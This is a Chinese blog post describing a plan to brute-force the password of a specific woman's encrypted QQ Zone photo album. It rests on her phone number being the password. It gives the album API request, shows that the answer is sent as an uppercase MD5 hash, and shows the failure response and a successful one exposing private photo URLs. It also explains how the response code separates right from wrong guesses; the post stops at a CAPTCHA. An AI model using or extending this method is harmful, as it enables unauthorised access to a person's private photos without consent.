python渗透

时间:2022-05-20 13:26:52

计划写一个获取qq空间加密相册的工具。

分析:

她的相册密码是手机号,先写一个生成手机号的脚本

空间有她之前的手机号,那么她现在的手机号也极有可能是一样的运营商,比如移动(缩小密码范围)

自己新建一个加密相册,通过工具测试,看看成功或失败的response内容的差别。

扩展工具,可以进行多种密码类型的组合

记录:

https://h5.qzone.qq.com/proxy/domain/photo.qzone.qq.com/fcgi-bin/cgi_list_photo
?g_tk=238297171
&callback=shine3_Callback
&t=247612204
&mode=0
&idcNum=4
&hostUin=xxx9883609
&topicId=V12sTtCU1D7iEU
&noTopic=0
&uin=xxx3633125
&pageStart=0
&pageNum=1
&skipCmtCount=0
&singleurl=1
&batchId=
&notice=0
&appid=4
&inCharset=utf-8
&outCharset=utf-8
&source=qzone
&plat=qzone
&outstyle=json
&format=jsonp
&json_esc=1
&question=%E6%89%8B%E6%9C%BA
&answer=E10ADC3949BA59ABBE56E057F20F883E
&callbackFun=shine3
&_=1510406853362

结果:

shine3_Callback({
"code":-10805,
"subcode":-10805,
"message":"对不起,回答错误",
"notice":0,
"time":1510406993,
"tips":"2A93-540",
"data":{
"priv" : 5,
"question" : "手机",
"t" : "247612204"
} }
);

&question=%E6%89%8B%E6%9C%BA (手机)

&answer=E10ADC3949BA59ABBE56E057F20F883E(123456)

answer是md5加密

工具:http://www.cmd5.com/

输入正确的密码,得到:adadacb7c2658e921758d3c4bf90765d

转大写:https://bigtosmall.51240.com/

ADADACB7C2658E921758D3C4BF90765D

替换之前错误的,返回结果:

shine3_Callback({
"code":0,
"subcode":0,
"message":"",
"default":0,
"data":
{
"limit" : 0,
"photoList" : [
{
"batchId" : "1510404687051",
"browser" : 0,
"cameratype" : " ",
"cp_flag" : false,
"cp_x" : 540,
"cp_y" : 822,
"desc" : "",
"exif" : {
"exposureCompensation" : "",
"exposureMode" : "",
"exposureProgram" : "",
"exposureTime" : "",
"flash" : "",
"fnumber" : "",
"focalLength" : "",
"iso" : "",
"lensModel" : "",
"make" : "",
"meteringMode" : "",
"model" : "",
"originalTime" : ""
},
"forum" : 0,
"frameno" : 0,
"height" : 1920,
"id" : 0,
"is_video" : false,
"is_weixin_mode" : 0,
"ismultiup" : 0,
"lloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"modifytime" : 1510404664,
"name" : "2017-11-11",
"origin" : 0,
"origin_upload" : 0,
"origin_url" : "",
"owner" : "xxx9883609",
"ownername" : "xxx9883609",
"photocubage" : 16930,
"phototype" : 17,
"picmark_flag" : 0,
"picrefer" : 66,
"platformId" : 52,
"platformSubId" : 2,
"poiName" : "",
"pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/a\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
"raw" : "",
"raw_upload" : 0,
"rawshoottime" : "2017-11-08 14:24:07",
"shoottime" : "2017-11-08 ",
"shorturl" : "",
"sloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"tag" : "",
"uploadtime" : "2017-11-11 20:51:04",
"url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/b\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
"width" : 1080,
"yurl" : 0
}
],
"t" : "247612204",
"topic" : {
"bitmap" : "10000010",
"browser" : 0,
"classid" : 106,
"comment" : 1,
"cover_id" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"createtime" : 1510404663,
"desc" : "",
"handset" : 0,
"id" : "V12sTtCU1D7iEU",
"is_share_album" : 0,
"lastuploadtime" : 1510404703,
"modifytime" : 1510406803,
"name" : "2017.11.11",
"ownerName" : "xxx9883609",
"ownerUin" : "xxx9883609",
"pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/a\/dPIAAAAAAAAA",
"priv" : 5,
"pypriv" : 3,
"share_album_owner" : 0,
"total" : 10,
"url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/b\/dPIAAAAAAAAA",
"viewtype" : 2

返回正确的结果了。

我们可以通过shine3_Callback的code 的值判断密码的正误。

当然,现实怎么会如此美好,当我尝试多次后发现有验证码,腾讯考虑的真TMD周到!

关于怎么获取验证码还需要研究下。待续。。。